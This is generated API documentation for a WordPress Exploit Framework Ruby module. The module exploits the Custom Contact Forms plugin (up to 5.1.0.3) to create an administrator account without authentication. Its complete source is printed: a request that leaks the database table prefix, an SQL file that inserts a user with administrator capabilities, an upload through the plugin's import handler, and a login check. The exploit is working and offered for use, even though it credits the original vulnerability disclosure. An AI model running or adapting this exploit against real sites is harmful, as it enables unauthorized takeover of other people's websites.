Class: Wpxf::Auxiliary::CustomContactFormsPrivilegeEscalation
- Includes:
- Wpxf, WordPress::Login
- Defined in:
- lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb
Constant Summary
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary collapse
- #check ⇒ Object
- #hashed_password ⇒ Object
-
#initialize ⇒ CustomContactFormsPrivilegeEscalation
constructor
A new instance of CustomContactFormsPrivilegeEscalation.
- #password ⇒ Object
- #payload_body_builder(prefix) ⇒ Object
- #run ⇒ Object
- #sql(prefix) ⇒ Object
- #sql_filename ⇒ Object
- #table_prefix ⇒ Object
- #username ⇒ Object
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ CustomContactFormsPrivilegeEscalation
Returns a new instance of CustomContactFormsPrivilegeEscalation.
7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 7 def initialize super update_info( name: 'Custom Contact Forms Privilege Escalation', desc: 'The Custom Contact Forms plugin, up to and including version '\ '5.1.0.3, allows unauthenticated users to create new admin users '\ 'due to lack of validation when uploading SQL files.', author: [ 'Marc-Alexandre Montpas', # Vulnerability discovery 'rastating' # WPXF module ], references: [ ['URL', 'http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html'], ['URL', 'https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail='], ['WPVDB', '7542'] ], date: 'Aug 07 2014' ) ([ StringOption.new( name: 'username', desc: 'The username to register with', default: Utility::Text.rand_alpha(10) ), StringOption.new( name: 'password', desc: 'The password to register with', default: Utility::Text.rand_alpha(rand(10..20)) ) ]) end |
Instance Method Details
#check ⇒ Object
53 54 55 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 53 def check check_plugin_version_from_readme('custom-contact-forms', '5.1.0.4') end |
#hashed_password ⇒ Object
49 50 51 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 49 def hashed_password Utility::Text.md5(password) end |
#password ⇒ Object
45 46 47 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 45 def password normalized_option_value('password') end |
#payload_body_builder(prefix) ⇒ Object
82 83 84 85 86 87 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 82 def payload_body_builder(prefix) builder = Utility::BodyBuilder.new builder.add_file_from_string('import_file', sql(prefix), sql_filename) builder.add_field('ccf_merge_import', '1') builder end |
#run ⇒ Object
89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 89 def run return false unless super emit_info 'Extracting table prefix...' prefix = table_prefix if prefix.nil? emit_error 'Unable to determine table prefix' return false else emit_success "Found table prefix: #{prefix}", true end emit_info 'Creating new admin user...' res = nil payload_body_builder(prefix).create do |body| scoped_option_change('follow_http_redirection', false) do res = execute_post_request(url: wordpress_url_admin_post, body: body) end end if res.code != 302 || res.headers['Location'] != 'options-general.php?page=custom-contact-forms' emit_error 'Failed to create new user' emit_error "Code: #{res.code}", true emit_error "Location header: #{res.headers['Location']}", true return false end emit_info 'Verifying new account...' if wordpress_login(username, password) emit_success "User #{username} with password #{password} successfully created" return true else emit_error 'Failed to create new user' return false end end |
#sql(prefix) ⇒ Object
71 72 73 74 75 76 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 71 def sql(prefix) <<-END_OF_SQL INSERT INTO #{prefix}users (user_login, user_pass) VALUES ('#{username}','#{hashed_password}'); INSERT INTO #{prefix}usermeta (user_id, meta_key, meta_value) VALUES ((select id from #{prefix}users where user_login='#{username}'),'#{prefix}capabilities','a:1:{s:13:"administrator";b:1;}'),((select id from #{prefix}users where user_login='#{username}'),'#{prefix}user_level','10'); END_OF_SQL end |
#sql_filename ⇒ Object
78 79 80 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 78 def sql_filename "#{Utility::Text.rand_alpha(5)}.sql" end |
#table_prefix ⇒ Object
57 58 59 60 61 62 63 64 65 66 67 68 69 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 57 def table_prefix res = execute_post_request( url: wordpress_url_admin_post, body: { 'ccf_export' => '1' } ) return nil if res.code != 200 || res.body.nil? || res.body.empty? match = res.body.match(/insert into `(.+_)customcontactforms_fields`/i) return nil if match.nil? || match.length < 2 match[1] end |
#username ⇒ Object
41 42 43 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 41 def username normalized_option_value('username') end |